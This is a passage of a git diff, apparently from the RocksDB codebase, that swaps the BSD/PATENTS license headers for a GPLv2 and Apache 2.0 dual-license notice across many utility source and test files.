-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef MERGE_OPERATORS_H
 #define MERGE_OPERATORS_H
diff --git a/utilities/merge_operators/cassandra/cassandra_format_test.cc b/utilities/merge_operators/cassandra/cassandra_format_test.cc
index 2def0d003e2..866098a1b09 100644
--- a/utilities/merge_operators/cassandra/cassandra_format_test.cc
+++ b/utilities/merge_operators/cassandra/cassandra_format_test.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // This source code is also licensed under the GPLv2 license found in the
 // COPYING file in the root directory of this source tree.
diff --git a/utilities/merge_operators/cassandra/cassandra_merge_test.cc b/utilities/merge_operators/cassandra/cassandra_merge_test.cc
index b898ca0e98a..84886161e25 100644
--- a/utilities/merge_operators/cassandra/cassandra_merge_test.cc
+++ b/utilities/merge_operators/cassandra/cassandra_merge_test.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // This source code is also licensed under the GPLv2 license found in the
 // COPYING file in the root directory of this source tree.
diff --git a/utilities/merge_operators/cassandra/cassandra_row_merge_test.cc b/utilities/merge_operators/cassandra/cassandra_row_merge_test.cc
index 1bd7e3ff9b9..76d112c7b03 100644
--- a/utilities/merge_operators/cassandra/cassandra_row_merge_test.cc
+++ b/utilities/merge_operators/cassandra/cassandra_row_merge_test.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // This source code is also licensed under the GPLv2 license found in the
 // COPYING file in the root directory of this source tree.
diff --git a/utilities/merge_operators/cassandra/cassandra_serialize_test.cc b/utilities/merge_operators/cassandra/cassandra_serialize_test.cc
index 06e9eaa9539..978878b64f8 100644
--- a/utilities/merge_operators/cassandra/cassandra_serialize_test.cc
+++ b/utilities/merge_operators/cassandra/cassandra_serialize_test.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // This source code is also licensed under the GPLv2 license found in the
 // COPYING file in the root directory of this source tree.
diff --git a/utilities/merge_operators/cassandra/format.cc b/utilities/merge_operators/cassandra/format.cc
index 2a65acb9965..01eff67e3ef 100644
--- a/utilities/merge_operators/cassandra/format.cc
+++ b/utilities/merge_operators/cassandra/format.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // This source code is also licensed under the GPLv2 license found in the
 // COPYING file in the root directory of this source tree.
diff --git a/utilities/merge_operators/cassandra/format.h b/utilities/merge_operators/cassandra/format.h
index 9aabc62673a..0ffd9a5bb98 100644
--- a/utilities/merge_operators/cassandra/format.h
+++ b/utilities/merge_operators/cassandra/format.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // This source code is also licensed under the GPLv2 license found in the
 // COPYING file in the root directory of this source tree.
diff --git a/utilities/merge_operators/cassandra/merge_operator.cc b/utilities/merge_operators/cassandra/merge_operator.cc
index 308b845983f..03b4ec2e39f 100644
--- a/utilities/merge_operators/cassandra/merge_operator.cc
+++ b/utilities/merge_operators/cassandra/merge_operator.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // This source code is also licensed under the GPLv2 license found in the
 // COPYING file in the root directory of this source tree.
diff --git a/utilities/merge_operators/cassandra/merge_operator.h b/utilities/merge_operators/cassandra/merge_operator.h
index b824c61824e..b46662c26d8 100644
--- a/utilities/merge_operators/cassandra/merge_operator.h
+++ b/utilities/merge_operators/cassandra/merge_operator.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // This source code is also licensed under the GPLv2 license found in the
 // COPYING file in the root directory of this source tree.
diff --git a/utilities/merge_operators/cassandra/serialize.h b/utilities/merge_operators/cassandra/serialize.h
index 55bc6bb2808..0e35d34af00 100644
--- a/utilities/merge_operators/cassandra/serialize.h
+++ b/utilities/merge_operators/cassandra/serialize.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // This source code is also licensed under the GPLv2 license found in the
 // COPYING file in the root directory of this source tree.
diff --git a/utilities/merge_operators/cassandra/test_utils.cc b/utilities/merge_operators/cassandra/test_utils.cc
index b742e2bc75f..91b9e634974 100644
--- a/utilities/merge_operators/cassandra/test_utils.cc
+++ b/utilities/merge_operators/cassandra/test_utils.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // This source code is also licensed under the GPLv2 license found in the
 // COPYING file in the root directory of this source tree.
diff --git a/utilities/merge_operators/cassandra/test_utils.h b/utilities/merge_operators/cassandra/test_utils.h
index 96e6ded0f25..4025b2a3fe8 100644
--- a/utilities/merge_operators/cassandra/test_utils.h
+++ b/utilities/merge_operators/cassandra/test_utils.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // This source code is also licensed under the GPLv2 license found in the
 // COPYING file in the root directory of this source tree.
diff --git a/utilities/merge_operators/max.cc b/utilities/merge_operators/max.cc
index 43f4e8bdeb6..06e233fe89d 100644
--- a/utilities/merge_operators/max.cc
+++ b/utilities/merge_operators/max.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
diff --git a/utilities/merge_operators/put.cc b/utilities/merge_operators/put.cc
index b8f998efccf..7f206ad3b09 100644
--- a/utilities/merge_operators/put.cc
+++ b/utilities/merge_operators/put.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
 #include "rocksdb/slice.h"
diff --git a/utilities/merge_operators/uint64add.cc b/utilities/merge_operators/uint64add.cc
index 9866e03e07d..d7821737517 100644
--- a/utilities/merge_operators/uint64add.cc
+++ b/utilities/merge_operators/uint64add.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
diff --git a/utilities/object_registry_test.cc b/utilities/object_registry_test.cc
index de79c223064..40fb387bc93 100644
--- a/utilities/object_registry_test.cc
+++ b/utilities/object_registry_test.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2016-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/option_change_migration/option_change_migration.cc b/utilities/option_change_migration/option_change_migration.cc
index 251caef774b..c9e7fbce0e3 100644
--- a/utilities/option_change_migration/option_change_migration.cc
+++ b/utilities/option_change_migration/option_change_migration.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "rocksdb/utilities/option_change_migration.h"
diff --git a/utilities/option_change_migration/option_change_migration_test.cc b/utilities/option_change_migration/option_change_migration_test.cc
index 8e154c1ee90..1f239b71c33 100644
--- a/utilities/option_change_migration/option_change_migration_test.cc
+++ b/utilities/option_change_migration/option_change_migration_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/utilities/options/options_util.cc b/utilities/options/options_util.cc
index 136e9d09a4d..21734923f56 100644
--- a/utilities/options/options_util.cc
+++ b/utilities/options/options_util.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/options/options_util_test.cc b/utilities/options/options_util_test.cc
index 2075c05661c..86b382cfab5 100644
--- a/utilities/options/options_util_test.cc
+++ b/utilities/options/options_util_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #ifndef __STDC_FORMAT_MACROS
diff --git a/utilities/persistent_cache/block_cache_tier.cc b/utilities/persistent_cache/block_cache_tier.cc
index bd0b04d5c8b..e65952cdb0b 100644
--- a/utilities/persistent_cache/block_cache_tier.cc
+++ b/utilities/persistent_cache/block_cache_tier.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include "utilities/persistent_cache/block_cache_tier.h"
diff --git a/utilities/persistent_cache/block_cache_tier.h b/utilities/persistent_cache/block_cache_tier.h
index 3672f48255e..9a8dec3a77f 100644
--- a/utilities/persistent_cache/block_cache_tier.h
+++ b/utilities/persistent_cache/block_cache_tier.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/utilities/persistent_cache/block_cache_tier_file.cc b/utilities/persistent_cache/block_cache_tier_file.cc
index 2f29ab798fd..85e0610b7e4 100644
--- a/utilities/persistent_cache/block_cache_tier_file.cc
+++ b/utilities/persistent_cache/block_cache_tier_file.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include "utilities/persistent_cache/block_cache_tier_file.h"
diff --git a/utilities/persistent_cache/block_cache_tier_file.h b/utilities/persistent_cache/block_cache_tier_file.h
index 269e80a1184..3922136d67e 100644
--- a/utilities/persistent_cache/block_cache_tier_file.h
+++ b/utilities/persistent_cache/block_cache_tier_file.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/utilities/persistent_cache/block_cache_tier_file_buffer.h b/utilities/persistent_cache/block_cache_tier_file_buffer.h
index 3dd18a131dd..9d9465c6ca9 100644
--- a/utilities/persistent_cache/block_cache_tier_file_buffer.h
+++ b/utilities/persistent_cache/block_cache_tier_file_buffer.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/utilities/persistent_cache/block_cache_tier_metadata.cc b/utilities/persistent_cache/block_cache_tier_metadata.cc
index b5289df8437..84d901bc471 100644
--- a/utilities/persistent_cache/block_cache_tier_metadata.cc
+++ b/utilities/persistent_cache/block_cache_tier_metadata.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include "utilities/persistent_cache/block_cache_tier_metadata.h"
diff --git a/utilities/persistent_cache/block_cache_tier_metadata.h b/utilities/persistent_cache/block_cache_tier_metadata.h
index a754a50eec0..14082bb4556 100644
--- a/utilities/persistent_cache/block_cache_tier_metadata.h
+++ b/utilities/persistent_cache/block_cache_tier_metadata.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/utilities/persistent_cache/hash_table.h b/utilities/persistent_cache/hash_table.h
index 8225a7d1332..36d8327e2ae 100644
--- a/utilities/persistent_cache/hash_table.h
+++ b/utilities/persistent_cache/hash_table.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
diff --git a/utilities/persistent_cache/hash_table_bench.cc b/utilities/persistent_cache/hash_table_bench.cc
index 9ad7e445d0d..65bcd7723fe 100644
--- a/utilities/persistent_cache/hash_table_bench.cc
+++ b/utilities/persistent_cache/hash_table_bench.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #if !defined(OS_WIN) && !defined(ROCKSDB_LITE)
diff --git a/utilities/persistent_cache/hash_table_evictable.h b/utilities/persistent_cache/hash_table_evictable.h
index cda15e5ab37..6557eb440e7 100644
--- a/utilities/persistent_cache/hash_table_evictable.h
+++ b/utilities/persistent_cache/hash_table_evictable.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
diff --git a/utilities/persistent_cache/hash_table_test.cc b/utilities/persistent_cache/hash_table_test.cc
index 7fd32dfb414..1a6df4e6144 100644
--- a/utilities/persistent_cache/hash_table_test.cc
+++ b/utilities/persistent_cache/hash_table_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #include
 #include
diff --git a/utilities/persistent_cache/lrulist.h b/utilities/persistent_cache/lrulist.h
index 96860da1a7a..1d2ef3182c8 100644
--- a/utilities/persistent_cache/lrulist.h
+++ b/utilities/persistent_cache/lrulist.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
diff --git a/utilities/persistent_cache/persistent_cache_bench.cc b/utilities/persistent_cache/persistent_cache_bench.cc
index f559bd17e85..4aeb0549cb0 100644
--- a/utilities/persistent_cache/persistent_cache_bench.cc
+++ b/utilities/persistent_cache/persistent_cache_bench.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/utilities/persistent_cache/persistent_cache_test.cc b/utilities/persistent_cache/persistent_cache_test.cc
index aafae4df80c..db9cf373fe7 100644
--- a/utilities/persistent_cache/persistent_cache_test.cc
+++ b/utilities/persistent_cache/persistent_cache_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/utilities/persistent_cache/persistent_cache_test.h b/utilities/persistent_cache/persistent_cache_test.h
index 9c06fa22f0e..77fd172ba08 100644
--- a/utilities/persistent_cache/persistent_cache_test.h
+++ b/utilities/persistent_cache/persistent_cache_test.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/utilities/persistent_cache/persistent_cache_tier.cc b/utilities/persistent_cache/persistent_cache_tier.cc
index f37224e0225..0f500e87127 100644
--- a/utilities/persistent_cache/persistent_cache_tier.cc
+++ b/utilities/persistent_cache/persistent_cache_tier.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/utilities/persistent_cache/persistent_cache_tier.h b/utilities/persistent_cache/persistent_cache_tier.h
index 426bec0bbff..25e0b3c0d60 100644
--- a/utilities/persistent_cache/persistent_cache_tier.h
+++ b/utilities/persistent_cache/persistent_cache_tier.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
diff --git a/utilities/persistent_cache/persistent_cache_util.h b/utilities/persistent_cache/persistent_cache_util.h
index d43412d3109..214bb5875d6 100644
--- a/utilities/persistent_cache/persistent_cache_util.h
+++ b/utilities/persistent_cache/persistent_cache_util.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/utilities/persistent_cache/volatile_tier_impl.cc b/utilities/persistent_cache/volatile_tier_impl.cc
index bee99c34417..d190a210282 100644
--- a/utilities/persistent_cache/volatile_tier_impl.cc
+++ b/utilities/persistent_cache/volatile_tier_impl.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/utilities/persistent_cache/volatile_tier_impl.h b/utilities/persistent_cache/volatile_tier_impl.h
index cdded0bc63a..dba500ccbb2 100644
--- a/utilities/persistent_cache/volatile_tier_impl.h
+++ b/utilities/persistent_cache/volatile_tier_impl.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
diff --git a/utilities/redis/redis_lists_test.cc b/utilities/redis/redis_lists_test.cc
index ce2016032b7..22acdff6444 100644
--- a/utilities/redis/redis_lists_test.cc
+++ b/utilities/redis/redis_lists_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 /**
 * A test harness for the Redis API built on rocksdb.
 *
diff --git a/utilities/simulator_cache/sim_cache.cc b/utilities/simulator_cache/sim_cache.cc
index 0f189f4b31b..335ac9896d0 100644
--- a/utilities/simulator_cache/sim_cache.cc
